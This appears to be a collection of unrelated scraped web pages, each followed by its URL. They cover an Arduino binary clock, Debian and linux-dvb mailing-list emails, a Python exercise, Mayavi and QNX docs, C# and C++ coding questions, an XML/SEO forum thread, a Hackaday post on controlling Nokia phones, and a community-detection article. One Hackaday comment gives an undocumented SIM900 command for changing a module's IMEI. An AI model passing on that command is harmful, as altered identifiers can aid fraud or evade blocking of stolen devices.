To mount the LEDs in the slave speaker I firstly masked the front with tape, then marked out the 11 holes. Because I have used breadboard, the spacing is nice and even, with each column 0.5" apart and 0.4" between LEDs in each column. Take care not to get carried away and drill out the middle top LED, as there isn't an LED in that position! When drilling, the masking tape helps to stop the drill bit wandering, and if you start with a 2mm drill you can check everything is in line before drilling bigger; even then I prefer to drill in steps using a 3.3mm drill, then lastly 5mm.

Step 6: The Arduino Nano Program Explained and Libraries Needed

The program uses the RTC library and the Time library, which were downloaded from:

Make sure you unzip the libraries into the Arduino/libraries folder. I then programmed the binary clock using a simple decimal to binary code. However, I had a few problems, as the RTC returns a time value in 24 hour format. To overcome this problem I firstly check if the hours value is zero and, if it is, set it to 12. Then, if the hour's value is 13 or greater, I subtract 12. That sorts out the 24 hour time.

Then we come to setting the time: the hours and minutes are adjusted by adding to the "raw" time value; 60 is added for each minute and 3600 for each hour.
    if (digitalRead(setM) == HIGH) {
        unsigned long j = RTC.get();
        j = j + 60;
        RTC.set(j);
    }
    if (digitalRead(setH) == HIGH) {
        unsigned long j = RTC.get();
        j = j + 3600;
        RTC.set(j);
    }

There is a little problem with this code: if you load it into your Arduino and nothing happens, then you may need to set the RTC using the "setTime" sketch in the Sketchbook/libraries/DS1307RTC/setTime file. Once loaded, click the serial monitor to check the time is correct. From what I can work out, if you buy a new RTC module it needs to be "started", else it won't be active. Then reload the binaryRTC code again and everything should work. I have listed the code, but please note I am not very good at programming, so don't expect too much!

Step 7: The Full Program

    #include <Wire.h>
    #include <Time.h>
    #include <DS1307RTC.h>

    const int setH = 14; // button for hour increase
    const int setM = 15; // button for minute increase
    const int UnitMin01 = 12;
    const int UnitMin02 = 9;
    const int UnitMin04 = 8;
    const int UnitMin08 = 7;
    const int UnitTen01 = 2;
    const int UnitTen02 = 11;
    const int UnitTen04 = 10;
    const int UnitHrs01 = 3;
    const int UnitHrs02 = 4;
    const int UnitHrs04 = 5;
    const int UnitHrs08 = 6;

    void setup() {
        delay(200);
        pinMode(setH, INPUT);
        pinMode(setM, INPUT);
        pinMode(UnitMin01, OUTPUT);
        pinMode(UnitMin02, OUTPUT);
        pinMode(UnitMin04, OUTPUT);
        pinMode(UnitMin08, OUTPUT);
        pinMode(UnitTen01, OUTPUT);
        pinMode(UnitTen02, OUTPUT);
        pinMode(UnitTen04, OUTPUT);
        pinMode(UnitHrs01, OUTPUT);
        pinMode(UnitHrs02, OUTPUT);
        pinMode(UnitHrs04, OUTPUT);
        pinMode(UnitHrs08, OUTPUT);
    }

    void loop() {
        tmElements_t tm;
        if (RTC.read(tm)) {
            if (digitalRead(setM) == HIGH) {
                unsigned long j = RTC.get();
                j = j + 60;
                RTC.set(j);
            }
            if (digitalRead(setH) == HIGH) {
                unsigned long j = RTC.get();
                j = j + 3600;
                RTC.set(j);
            }
            binaryOutputHours(tm.Hour);
            binaryOutputMinutes(tm.Minute);
        }
        delay(1000);
    }

    void binaryOutputHours(int number) {
        if (number == 0) { number = 12; }
        if (number >= 13) { number = number - 12; }
        setBinaryHours(number);
    }

    void binaryOutputMinutes(int number) {
        if (number >= 10) {
            int tens = number / 10;
            int units = number - (tens * 10);
            setBinaryMins(units);
            setBinaryTens(tens);
        } else {
            int tens = 0;
            int units = number;
            setBinaryMins(units);
            setBinaryTens(tens);
        }
    }

    void setBinaryMins(int units) {
        if (units >= 8) { digitalWrite(UnitMin08, HIGH); units = units - 8; } else { digitalWrite(UnitMin08, LOW); }
        if (units >= 4) { digitalWrite(UnitMin04, HIGH); units = units - 4; } else { digitalWrite(UnitMin04, LOW); }
        if (units >= 2) { digitalWrite(UnitMin02, HIGH); units = units - 2; } else { digitalWrite(UnitMin02, LOW); }
        if (units >= 1) { digitalWrite(UnitMin01, HIGH); units = units - 1; } else { digitalWrite(UnitMin01, LOW); }
    }

    void setBinaryTens(int tens) {
        if (tens >= 4) { digitalWrite(UnitTen04, HIGH); tens = tens - 4; } else { digitalWrite(UnitTen04, LOW); }
        if (tens >= 2) { digitalWrite(UnitTen02, HIGH); tens = tens - 2; } else { digitalWrite(UnitTen02, LOW); }
        if (tens >= 1) { digitalWrite(UnitTen01, HIGH); tens = tens - 1; } else { digitalWrite(UnitTen01, LOW); }
    }

    void setBinaryHours(int hours) {
        if (hours >= 8) { digitalWrite(UnitHrs08, HIGH); hours = hours - 8; } else { digitalWrite(UnitHrs08, LOW); }
        if (hours >= 4) { digitalWrite(UnitHrs04, HIGH); hours = hours - 4; } else { digitalWrite(UnitHrs04, LOW); }
        if (hours >= 2) { digitalWrite(UnitHrs02, HIGH); hours = hours - 2; } else { digitalWrite(UnitHrs02, LOW); }
        if (hours >= 1) { digitalWrite(UnitHrs01, HIGH); hours = hours - 1; } else { digitalWrite(UnitHrs01, LOW); }
    }

Mr_fid: Love the clock. Built it on a breadboard. Having problems with code. I would like for you to take a look and see where I'm off. What's a good way to send it to you? I've copied some of the errors for you to get a brief glimpse.
    C:\User\Snoopy's_blah_blah_blah\documents\arduino\_12_Hr_Binary_Clock\_12_Hr_Binary_Clock.ino: In function 'void loop()':
    _12_Hr_Binary_Clock:43: error: 'tmElements_t' was not declared in this scope
     tmElements_t tm;
     ^
    _12_Hr_Binary_Clock:44: error: 'RTC' was not declared in this scope
     if (RTC.read(tm))
     ^

There are more errors than that, but it's a good example to start with. Some of the posts talk about the RTC library. I believe I've installed them in the library correctly. (IDE; Sketch; drop down menu; Include Library; DS1307RTC) (Download Zip. IDE; Sketch; drop down menu; Include Library; Add .ZIP Library.) I know it has to be a programming / library issue. The problem is I'm learning this all the hard way. No formal classes or instructors, just a few books (Programming Arduino, Simon Monk). Any help would be both great and educational. (Chalk one more up for hard knocks.) Thanks

Thanks for your comments, and hopefully as a bit of encouragement... this was one of my first programs with the Arduino, and just like you I took the same path, learning on my own with the help of Simon Monk's book! And the program is really, really bad! (but works) It's written in a very poor style! One of my first problems was the libraries; what I did was to get the DS1307RTC library and put the "DS1307RTC" folder into the libraries folder, which should be in the Arduino folder in my Documents. Another library, Time, should also be added to the libraries folder and can be downloaded from:

Give those two bits a try, and in the meantime I am cleaning up this program listing to make it easier to read.

Hello Sir. I've finally got the clock working on the breadboard. Had to do some rewiring (switches) and much reading and studying (in between my farming). Now to finalize it into a permanent container. Thanks so much for making the original and inspiring the rest of us too. I'll post a picture of the final product when it's complete.

This looks great! I have a Binary Clock Widget on my phone. How accurate is your clock?

Just to update this comment... I have had the clock running for a few weeks now and I can see it gains about 9 seconds a day, so when I get a chance I will update the program to subtract 9 seconds each morning.

Ha! That's a great solution!

That's a good question. This was the second one I made, and as yet I haven't run it for more than one day. However, the original unit did lose time. So I was going to keep a note of the new RTC and work out how much the clock loses/gains, and change the program so it corrects the clock every day. That's providing it always loses/gains time and not both (if you see what I mean).
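The sketch's decimal-to-binary column logic (hours folded to 1-12, minutes split into tens and units, each column read bottom-up) can be prototyped off-board before committing it to the Nano. This Python sketch mirrors that logic; the function names are illustrative, not part of the Arduino program.

```python
def to_bits(value, nbits):
    # Least-significant bit first, matching the bottom-up LED columns.
    return [(value >> b) & 1 for b in range(nbits)]

def clock_columns(hour24, minute):
    hour = hour24 % 12 or 12          # 0 -> 12, 13-23 -> 1-11, as in the sketch
    tens, units = divmod(minute, 10)
    return {
        "hours": to_bits(hour, 4),    # left column, 4 LEDs (1-12)
        "tens": to_bits(tens, 3),     # middle column, 3 LEDs (0-5)
        "units": to_bits(units, 4),   # right column, 4 LEDs (0-9)
    }

print(clock_columns(0, 59))
# {'hours': [0, 0, 1, 1], 'tens': [1, 0, 1], 'units': [1, 0, 0, 1]}
```

Midnight (hour 0) correctly shows as 12, and 59 minutes lights 1+4 in the tens column and 1+8 in the units column, just as the setBinary* functions do with their successive subtractions.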
http://www.instructables.com/id/12-Hr-Binary-Clock-hours-and-minutes-only-DS1307-R/
On Thu, 21 Feb 2008 13:08:11 +0100, Xavier Oswald wrote: > > I don't have a compelling reason to jump and adopt this package; > > however, I know many modules in the Authen::* namespace were recently > > grabbed by Xavier Oswald. Xavier, or anybody in the group: Are you > > interested? :) > Yes Im interested ! My libauthen-simple-smb-perl depends on libauthen-smb-perl ! > Im upstream of a project which will use it. I will work on it today. Good. FWIW: #432809 is an RC bug against libauthen-smb-perl, but I think Barry's proposed patch is not the best solution, I agree more with Michael's reasoning in the original report. Cheers, gregor -- .''`. | gpg key ID: 0x00F3CFE4 : :' : debian: the universal operating system - `. `' member of | how to reply: `- A woman should have compassion. -- Kirk, "Catspaw", stardate 3018.2
http://lists.debian.org/debian-perl/2008/02/msg00071.html
Solutions will be available when this assignment is resolved, or after a few failed attempts.

Time is over! You can keep submitting your assignments, but they won't count toward the score of this quiz.

Make a car that can drive!

Create a class Car that is initialized with one mandatory argument: electric. It will have a method called drive that returns the sound the car makes. Make sure the text of the sound output matches the example. You can access the attributes in the drive method through the self variable.

Example:

car1 = Car(electric=False)
print(car1.electric)  # False
print(car1.drive())   # 'VROOOOM'

car2 = Car(electric=True)
print(car2.electric)  # True
print(car2.drive())   # 'WHIRRRRRRR'

Test Cases

test drive not electric - Run Test

def test_drive_not_electric():
    car1 = Car(electric=False)
    assert isinstance(car1, object) is True
    assert hasattr(car1, 'electric') is True
    assert car1.electric is False
    assert car1.drive() == 'VROOOOM'
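One possible solution to the exercise (a sketch; only the names given in the prompt are assumed):

```python
class Car:
    """A car that is either electric or gas-powered."""

    def __init__(self, electric):
        self.electric = electric

    def drive(self):
        # Electric cars whirr; combustion cars vroom.
        return 'WHIRRRRRRR' if self.electric else 'VROOOOM'


car1 = Car(electric=False)
print(car1.drive())  # VROOOOM

car2 = Car(electric=True)
print(car2.drive())  # WHIRRRRRRR
```

Storing the flag on `self` in `__init__` is what makes `hasattr(car1, 'electric')` in the test case pass.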
https://learn.rmotr.com/python/introduction-to-programming-with-python/intro-to-oop/make-a-car-that-can-drive
Mayavi: mlab

Note: This page is about the tvtk.tools.mlab module. You are strongly advised to use the more recent mayavi.mlab module, which can also be used from ipython -wthread or as a library inside another application.

Important: All these examples must be run in "ipython -wthread" or in a Wx application (like PyCrust, or the MayaVi2 application). They will not work if you don't use this option.

Start with `ipython -wthread` and paste the following code::

    import scipy

    # prepare some interesting function:
    def f(x, y):
        return 3.0*scipy.sin(x*y+1e-4)/(x*y+1e-4)

    x = scipy.arange(-7., 7.05, 0.1)
    y = scipy.arange(-5., 5.05, 0.1)

    # 3D visualization of f:
    from enthought.tvtk.tools import mlab
    fig = mlab.figure()
    s = mlab.SurfRegular(x, y, f)
    fig.add(s)

Another example::

    from scipy import *
    [x, y] = mgrid[-5:5:0.1, -5:5:0.1]
    r = sqrt(x**2 + y**2)
    z = sin(3*r)/(r)

    from enthought.tvtk.tools import mlab

    # Open a viewer without the object browser:
    f = mlab.figure(browser=False)
    s = mlab.Surf(x, y, z, z)
    f.add(s)
    s.scalar_bar.title = 'sinc(r)'
    s.show_scalar_bar = True
    # LUT means "Look-Up Table"; it gives the mapping between scalar value and color
    s.lut_type = 'blue-red'
    # The current figure has two objects: the outline object originally present,
    # and the surf object that we added.
    f.objects[0].axis.z_label = 'value'
    t = mlab.Title()
    t.text = 'Sampling function'
    f.add(t)
    # Edit the title properties with the GUI:
    t.edit_traits()

List of different functionalities

* SurfRegular - MayaVi1's imv.surf-like functionality that plots surfaces given x (1D), y (1D) and z (or a callable) arrays.
* SurfRegularC - Also plots contour lines.
* TriMesh - Given triangle connectivity and points, plots a mesh of them.
* FancyTriMesh
* FancyMesh - Like mesh but shows the mesh using tubes and spheres.
* Surf - This generates a surface mesh just like Mesh but renders the mesh as a surface.
* Contour3 - Shows contour for a mesh.
* ImShow - Allows one to view large numeric arrays as image data using an image actor.
This is just like MayaVi1's `mayavi.tools.imv.viewi`.

To see nice examples of all of these, look at the `test_*` functions at the end of this file. Here is a quick example that uses these test functions::

    from enthought.tvtk.tools import mlab
    f = mlab.figure()
    mlab.test_surf(f)      # Create a spherical harmonic.
    f.pop()                # Remove it.
    mlab.test_molecule(f)  # Show a caffeine molecule.
    f.renwin.reset_zoom()  # Scale the view.
    f.pop()                # Remove this.
    mlab.test_lines(f)     # Show pretty lines.
    f.clear()              # Remove all the stuff on screen.

Section author: ArndBaecker, GaelVaroquaux, Christian Gagnon
http://scipy-cookbook.readthedocs.io/items/MayaVi_mlab.html
The DataGridView is a terrific control built into .NET that provides a customizable table for entering and displaying data. If you provide the DataGridView in your software as a means for the user to enter multiple rows of data, you may wish to redefine the default behavior of the Enter key. By default, when you press the Enter key in the DataGridView, the cursor moves to the cell in the same column immediately below the current cell (red arrow in the image below). But when entering multiple rows of data, a better response from the Enter key would be to move the cursor to the first cell in the next row (blue arrow).

To do this, you can derive a new class from the DataGridView:

public class Grid : DataGridView
{

Then override the OnKeyUp protected method as follows:

protected override void OnKeyUp( KeyEventArgs e )
{
    if (e.KeyCode == Keys.Enter)
    {
        int currentRow = this.CurrentRow.Index;
        if (currentRow >= 0)
            this.CurrentCell = this.Rows[currentRow].Cells[0];
    }
    base.OnKeyUp( e );
}

Of course, if you wish to provide this capability for an existing DataGridView, you can simply subscribe to the KeyUp event and execute the same code above in the event handler.

I have searched for this solution for a couple of hours. I'm really happy to find it. Thanks.

me too 🙂

Thanks for the above-mentioned code, but being a new programmer, please clarify my doubt: even if I derive a new class Grid, how can we use that class in our code? What I mean is, DataGridView is a control, so don't we have to work with the same object, say dtg1? And when we press the Enter key in dtg1, how will the overridden method from the Grid class get called?? I know I might be asking a childish one, but I just want to clear my concept. Please reply.

Swaroop, there are two ways to use a derived DataGridView control:

1. You can add your derived DataGridView to the Toolbox, then drag and drop your derived object onto your Design view.

2. You can edit the designer-generated code directly and replace the DataGridView class name with your derived class name. Note that this must be done in two places: the object definition, and the statement that creates the object.

timm: I only made the change in InitializeComponent(). I don't know where to find the statement that creates the object in the designer code.

Thank you @Boki – I think that would be enough; I did the same here and it worked fine. Thank you everybody!

protected override void OnKeyDown( KeyEventArgs e )
{
    if (e.KeyCode == Keys.Enter)
    {
        e.SuppressKeyPress = true;  // suppress ENTER
        SendKeys.Send("{Tab}");     // next column (or row)
    }
    base.OnKeyDown( e );
}

Use the code above to move the cursor to the next column. But after entering the data and pressing the Enter key, the cursor moves to the next row; it should stay on the same row. Please give code for the above problem.

hi, I need a similar solution: when pressing the Enter key, I would like to "stay" at the same cell, but enter a new line (such as Ctrl+Enter does). can you help? Tomer.

I am really new to VB. I have the same problem as above but I use VB.NET, not C#. How do I convert this info for my use, and where in the code do I put it? My DataGridView is named Senior_dataDataGridView. I have tried many so-called solutions but none have worked for me, probably because I don't know where to put the code, and I have never had a .NET solution. If you could help me I would really appreciate it.

Hi Bill, I am a C# programmer. I was looking for the same solution in C# but I found one for VB.NET; you can check it here.

This is tough. I'm not calling you out though; I think it is everyone else out there that isn't taking notice.

How do I use the above code? Do I need to create the object, and if so where, in an event handler?

Nice, it's working well, but it should go down and come back up. How do I make that happen? But it's very good.

Hi, it's working well, but it should go down and come back up. I also wrote some validations for every cell; when a validation fails I get an error. How can I solve this issue? I want the validations and also the Enter key behavior. Please help me, anybody. My id…

Thanks for this solution, but when I edit the cell it doesn't work. Any suggestions?
http://www.csharp411.com/enter-key-in-datagridview/
ltrunc()

Truncate a file at a given position

Synopsis:

#include <sys/types.h>
#include <unistd.h>

off_t ltrunc( int fildes,
              off_t offset,
              int whence );

Arguments:

- fildes
  The file descriptor of the file that you want to truncate.
- offset, whence
  Together, these specify the position at which to truncate the file; the offset is measured from a point determined by whence, as for lseek().

Returns:

The offset of the new end of file, or -1 if an error occurred (errno is set).

Errors:

- EBADF
  The fildes argument isn't a valid file descriptor, open for writing.
- EINVAL
  The whence argument isn't a proper value, or the resulting file size would be invalid.
- ENOSYS
  An attempt was made to truncate a file of a type that doesn't support truncation (for example, a file associated with the device manager).
- ESPIPE
  The fildes argument is associated with a pipe or FIFO.

Caveats:

The ltrunc() function isn't portable, and shouldn't be used in new code. Use ftruncate() instead.

See also:

errno, ftruncate(), lseek()
http://www.qnx.com/developers/docs/6.3.2/neutrino/lib_ref/l/ltrunc.html
Theoretically, you would think it would help, as parsing XML is programmatically more rigid than non-valid HTML... Nothing is wrong with HTML: after all, XHTML is just XML-compliant markup that corresponds to the HTML 4.01 schema, basically. Still, your page still isn't *quite* XML. And the way things are currently going, you can almost bet that pages in the future will be written mainly in XML (or at least a growing percentage)... But in terms of programming generated pages in .NET, for instance, it's a breeze from a programmer's point of view to generate XML content with stylesheets to make it render appropriately. Unfortunately, only Gecko-based browsers and Opera can handle it... But I have faith that the next version of IE can handle it. If not, XSLT can then be easily incorporated for IE users. Bottom line, I like playing with the latest and greatest, even though it's not always commercially feasible.

I think the question should be: could Google index the XML and the associated XSLT stylesheet, with its h1 tags, anchors, alts, etc.? Or more succinctly, what factors would Google use to rank an XML document? The XHTML standard is, I believe, supposed to be a transition or bridge from HTML to XML compliancy for the web as a whole, according to the W3C, if I remember correctly. Anyone please feel free to correct anything above.

Separation of presentation from content is one. There are many others though. You're right though john, I was thinking in terms of client-side transformation... Still, I'm amazed that we have to transform a new standard into an old standard for the likes of someone like Google.

"I was trying to surf an xml doc in an old version of Netscape earlier today. Barf, said the browser."

The old Netscape doesn't have an XML parser. Jeez, I'm not trying to be funny, but if you're using an old Netscape I really am worried for Google.

[edited by: tantalus at 12:45 pm (utc) on Dec. 18, 2003]

What's the advantage of XML over HTML?

1. Separation of presentation from content is one.
2. Integration with SOAP engines.
3. A far more "strict" mark-up language than HTML.
4. Storage of content data in a tree-like structure.

TJ

Doesn't Google's searching the XML as text find the data? If there are transforms associated, then, in a world of browsers that can do the business, the user would see the data transformed. I'm surprised people are expecting Google to do the transforms... but then I am new to XML/XSLT. My impression was that XHTML 1.1 -> 2.0 was here to stay and XSLT can generate it easily enough. Anyway, if you're interested, I did a search for .xml; here are a couple of examples from the SERPs:

www.****xx.com/weblog/index.xml File Format: Unrecognized - View as HTML Similar pages
xx.****.com/index.xml File Format: Unrecognized - View as HTML Similar pages

All of them say "File Format: Unrecognized", and all are RSS feeds, if that makes any difference. Click on "view as html" and you get a blank Google cache.

I'd be far more worried if Google wasn't interested in being compatible for the entire searching public. There are still large corporations and government agencies using Netscape 4.7. Under 5% usage isn't much to worry about for the site Joe_Webmaster's nephew made for him in FrontPage that gets maybe 500 uniques a month looking for budget widgets, but when you're getting into billions of searches, that's a lot of users whose needs would be neglected.

1. Does Googlebot follow an <a href> found in an XML page?
2. What about links that are not in the form of <a href>, such as <link></link>? Does/will Google follow those?

I guess my main question is: are pure XML pages currently "dead ends" for Googlebots?
see this thread maybe [webmasterworld.com ]

It seems probable that the days of coding the actual display language will end, and a machine-language standard will be adopted universally, with everything done by command text docs or WYSIWYG, like console apps are done today, before the computer world gets turned upside down by XML or XHTML.

Wishing HTML was dead won't make it so.

but I expect it'll be all the rage in ~2006+?

I suspect a little sooner than that. But it is certainly the future path - a search around for tools and applications that use XML as a mark-up language is testament to that. It's not about browsers. It's about the integration of many platform-independent systems over the internet, of which browsers form part. I doubt whether HTML will ever be "dead" - it will just move through various incarnations. TJ

I'd love to know whether you're attaching an XSL stylesheet to your posts :) oops, it's just gone. I quickly looked at the advanced search on Google and noticed that in the 'return results of the file format' drop-down, neither .txt nor .xml was listed. It does seem to index the title and follow links, but that seems to be about it.

I agree. The problem with XML from the point of view of a search engine robot is what it says on the tin, i.e. eXtensible Markup Language. There are lots of different namespaces and flavours of XML, which is one of its appeals: it can be all things to all men. I guess that if it does get past the XHTML stage, then there would probably be a limited range of doctypes and DTDs that search engines would be prepared to crawl and parse. I think that the tail may be wagging the dog for some time to come on this one, and who in their right mind is going to produce a web page that SE robots can't crawl when it is actually easier to produce one that they can? Best wishes, Sid

It does seem to index the title and follow links, but that seems to be about it. That doesn't surprise me....
although "indexing the title" I don't really understand. Are you sure it's not indexing the anchor text of the link to the XML file? XML is just text. If you create an XML file but with an .html extension, then Google will index it. And if you use <a href=> style tags for the link structure, then it will probably follow the link and transfer PR through. But it will not validate, and to Google it sure will look ugly. XML is really just a protocol and data storage format. The data from an XML file is parsed into an HTML file for display to the user. And it's the "display to the user" part that Google is interested in. XML is also used to call a function, method or procedure on a SOAP server or other XML-based server application over a network. Googlebot would have absolutely no interest in that. <guess>So I suspect what you're seeing in Google is indexed anchor text and nothing more</guess>. TJ

If you want to play with the latest and greatest, that is fine. Go for it. But if you want to be useful to the greatest number of people, then go with HTML. Google's goal is to serve the many, so they need to be concerned with what works with most browsers. I expect that XML will gain in popularity, but there is no compelling reason for most sites to change from HTML. There are billions of static pages out there that are going to stay on the web for a long time, and they are owned by people that have no interest in being on the bleeding edge. XML will have to be in the browsers for quite a while before it even starts making a dent in the total number of pages out there.

Kinda right... it seems to use the URL as the title, sorry, wasn't looking.
kirkcerny501: It might be to do with the doctype you are using, i.e. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

"Google needs to worry about the *majority* of their users"

I agree with your sentiments bigdave, and at the end of the day, as was said previously, all you need do is implement a server-side transformation... but: does Google like <br> better than <br />?

Hi, I have an XHTML site/page which is in the SERPs at #3 for its primary term. It has quite a few <br /> tags, and /> at the end of image tags; this does not seem to harm its SERPs ranking. From a sample of one, I can say that XHTML tags do not seem to affect Google. Best wishes, Sid.
They should just understand that if they want to be on the bleeding edge, that it is their blood that will be spilled. Those pages will not rank well for now. It is better to start new topics in a new thread.. Closed tags such as <br /> are XHTML rather than HTML so your a couple of steps ahead of yourself with a HTML 4.01 Transitional header, which is why your getting suggestion that the tag is xml. You might want to read this thread.. [webmasterworld.com ] HTML 4.01 Transitional.. Should I change this doc type statement, delete it, keep it?
https://www.webmasterworld.com/forum3/20840.htm
While [Ilias Giechaskiel] was waiting for his SIM900 shield to arrive, he decided to see what he could do with an old Nokia 6310i and an Arduino. He was researching how to send automated SMS text messages for a home security project, and found it was possible to send AT commands via the headphone jack of Motorola phones. But unfortunately Nokia did not support this, as they use a protocol known as FBus. With little information to go on, [Ilias] was able to break down the complicated protocol and take control with his Arduino.

With the connections in place, [Ilias] was able to communicate with the Nokia phone using a program called Gnokii — a utility written specifically for controlling the phone with a computer. Using the Arduino as an intermediary, he was eventually able to tap into the FBus and send SMS messages. Be sure to check out his blog, as [Ilias] goes into great detail on how Nokia's FBus protocol works and provides all the source code needed to replicate his hack. There is also a video demonstration at the end showing the hack in action.

9 thoughts on "Controlling Nokia Phones With Arduino"

That's cool, I gotta try it with my old Nokia phone.

That's a nice hack! I want to say 'at last!' because there are so many old phones that could be used for something like this! Great job on getting the protocol to work! A small comment on the voltage divider: the 2.5V level is still considered a logic high from the phone's perspective, and it's easier to make a divider with the same value instead of calculating the right values (and finding them in the parts bin). There's absolutely nothing wrong with the approach – it's the right way. The lazy way of using a 1:2 divider is just quicker sometimes.

I think that's the reason behind the dividers that is mentioned in the article.

Nice! I learnt a lot playing with FBus :)

For anyone looking for more information, I did a similar project with old Nokia phones many years ago. I go over the electronics and software used.
I ended up offloading the work to a PC via a DIY serial cable, where a Python script calls into Gammu (a CLI for older Nokia devices).

Fun fact about the SIM900(D): you can change the IMEI of the module using the undocumented AT+SIMEI="new imei" command.

Old Siemens phones (x35 and x45 series) are even simpler to interface. They have a 3.3V UART interface on the bottom of the phone, and the commands are very well documented. The drawback is that they use the PDU message format and cannot be forced into text mode, so you have to write functions for 7-bit -> 8-bit conversions (and vice versa). Not a big deal, but it complicates things a bit, especially if you use a uC with 128 bytes of RAM. The good thing is that you can buy those phones for a few bucks, while a TC35 module (which supports text mode) costs about $30.

It's worth noting that you can send an SMS with 3 lines of code via QPython3 and an old Android:

import android
Andy = android.Android()
Andy.smsSend('5553217654', 'hello world')

I could not help smiling when I saw the picture of the wires soldered to the bottom connector :-) Excellent hack, great write-up!

I'd like to make an Arduino shield for this. Anyone interested in giving some feedback?

Here is the Hackaday post regarding my blog post. Some good information in the comments.
https://hackaday.com/2015/01/01/controlling-nokia-phones-with-arduino/
Johannes Stezenbach wrote:
>Hi,
>
>Two problems:
>- I was talking with Mauro about merging dvb and v4l CVS trees,
>  and they want to keep backwards compatibility; we'll need to sort
>  this out first

Last night, I finished applying Jean Delvare's changes to the video4linux tree. The I2C_DEVNAME / i2c_clientname --> client.name stuff in 2.6.14 is actually backwards compatible with older 2.6 kernels. The incompatibility exists somewhere in the 2.5.x series... AFAIK, the only portion of these patches that breaks kernels older than 2.6.14-rc1 is changes such as the following:

@@ -408,7 +406,7 @@
 i2c_adapter->dev.parent = &dev->pci->dev;
 i2c_adapter->algo = &saa7146_algo;
 i2c_adapter->algo_data = NULL;
-i2c_adapter->id = I2C_ALGO_SAA7146;
+i2c_adapter->id = I2C_HW_SAA7146;
 i2c_adapter->timeout = SAA7146_I2C_TIMEOUT;
 i2c_adapter->retries = SAA7146_I2C_RETRIES;
 }

This can be handled in one of two ways:

1) either do something like this:

@@ -388,14 +386,18 @@
 #ifdef I2C_CLASS_TV_ANALOG
 .class = I2C_CLASS_TV_ANALOG,
 #endif
-I2C_DEVNAME("saa7134"),
+.name = "saa7134",
+#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,13)
+.id = I2C_HW_SAA7134,
+#else
 .id = I2C_ALGO_SAA7134,
+#endif
 .algo = &saa7134_algo,
 .client_register = attach_inform,

...but I know you don't like these #if's and #ifdef's in dvb-kernel cvs.

2) An alternative would be to create a "compat.h", which could assign the value of I2C_HW_SAA7146 to be equal to the value of I2C_ALGO_SAA7146, if I2C_HW_SAA7146 isn't already defined.

>We'll need to get this patch from git and apply the dvb and v4l
>parts when the time has come.

So, I repeat... the v4l portion has already been applied to video4linux cvs, without hindering kernel backwards compatibility. The dvb portion can easily be applied with some #if macros / compat.h stuff..... meanwhile, don't let this stop the tree-merging process....
If video4linux is backwards compatible and dvb-kernel isn't right away, all that means is that we should not attempt to compile dvb-kernel stuff when compiling the merged tree against older kernels (until we work out the backwards-compat kinks). We can take care of these decisions in a configure script....

--
Michael Krufky
http://www.linuxtv.org/pipermail/linux-dvb/2005-September/004768.html
Getting the off-by-a-penny problem...

Enter an amount in double, for example 11.56: 12.35
Your amount 12.35 consists of
        12 dollars
        1 quarters
        0 dimes
        1 nickels
        4 pennies
Press ENTER to continue...

Where do I properly add my + .00001? I tried a few places but it did not work... any insight?

Code:

#include <iostream>
using namespace std;

int main()
{
    // Receive the amount
    cout << "Enter an amount in double, for example 11.56: ";
    double amount;
    cin >> amount;

    int remainingAmount = static_cast<int>(amount * 100);

    // Find the number of one dollars
    int numberOfOneDollars = remainingAmount / 100;
    remainingAmount = remainingAmount % 100;

    // Find the number of quarters in the remaining amount
    int numberOfQuarters = remainingAmount / 25;
    remainingAmount = remainingAmount % 25;

    // Find the number of dimes in the remaining amount
    int numberOfDimes = remainingAmount / 10;
    remainingAmount = remainingAmount % 10;

    // Find the number of nickels in the remaining amount
    int numberOfNickels = remainingAmount / 5;
    remainingAmount = remainingAmount % 5;

    // The rest are pennies
    int numberOfPennies = remainingAmount;

    cout << "Your amount " << amount << " consists of \n"
         << "\t" << numberOfOneDollars << " dollars\n"
         << "\t" << numberOfQuarters << " quarters\n"
         << "\t" << numberOfDimes << " dimes\n"
         << "\t" << numberOfNickels << " nickels\n"
         << "\t" << numberOfPennies << " pennies";

    /* Scaffolding code for testing purposes */
    cin.ignore(256, '\n');
    cout << "Press ENTER to continue..." << endl;
    cin.get();
    /* End Scaffolding */

    return 0;
}
http://cboard.cprogramming.com/cplusplus-programming/116021-off-penny-problem-printable-thread.html
- Kernix Lab, published on 07/11/2016

With the democratization of the internet, interacting and sharing knowledge is simpler than ever. This digital world has enabled a whole new way of consuming, learning, communicating and creating relationships, unleashing an enormous amount of data that we can analyze to get a better understanding of human behavior.

One way that we can use this data is to build networks of relationships between individuals or objects (friendships between Facebook users, co-purchasing of products on Amazon, genetic co-occurrence, etc.). The field of community detection aims to identify highly connected groups of individuals or objects inside these networks; these groups are called communities. The motives behind community detection are diverse: it can help a brand understand the different groups of opinion toward its products, target certain groups of people or identify influencers; it can also help an e-commerce website build a recommendation system based on co-purchasing. The examples are numerous. If you want to learn about community detection in more detail, you can read about it here.

The aim of this article is to introduce you to the principal algorithms for community detection and discuss how we can evaluate their performance to build a benchmark. Furthermore, depending on the field we are studying, we encounter many different types of networks, and this can cause variations in the algorithms' performance. That's why we will also try to understand what elements of a network's structure affect the performance of these algorithms.

Different methods have emerged over the years to efficiently uncover communities in complex networks. The most famous principle is maximizing a measure called modularity in the network, which is approximately equivalent to maximizing the number of edges (relationships) inside the communities and minimizing the number of edges between the communities.
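As a concrete illustration of the modularity idea, here is a small pure-Python sketch; the toy graph (two triangles joined by one bridge edge) and the community labels are made up for the example:

```python
# Modularity for an undirected graph: Q = sum over communities c of
#   L_c / m  -  (d_c / (2*m))**2
# where m is the edge count, L_c the edges inside c, d_c the total degree of c.
from collections import defaultdict

def modularity(edges, membership):
    m = len(edges)
    internal = defaultdict(int)    # L_c: edges with both endpoints in community c
    degree_sum = defaultdict(int)  # d_c: summed degree of the nodes of c
    for u, v in edges:
        degree_sum[membership[u]] += 1
        degree_sum[membership[v]] += 1
        if membership[u] == membership[v]:
            internal[membership[u]] += 1
    return sum(internal[c] / m - (degree_sum[c] / (2 * m)) ** 2
               for c in degree_sum)

# Two triangles joined by a single bridge edge (2, 3):
edges = [(0, 1), (0, 2), (1, 2), (3, 4), (3, 5), (4, 5), (2, 3)]
membership = {0: 'A', 1: 'A', 2: 'A', 3: 'B', 4: 'B', 5: 'B'}
print(modularity(edges, membership))  # about 0.357: a good split
```

Putting all six nodes into a single community gives Q = 0, which is why maximizing Q favors densely connected groups with few edges between them.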
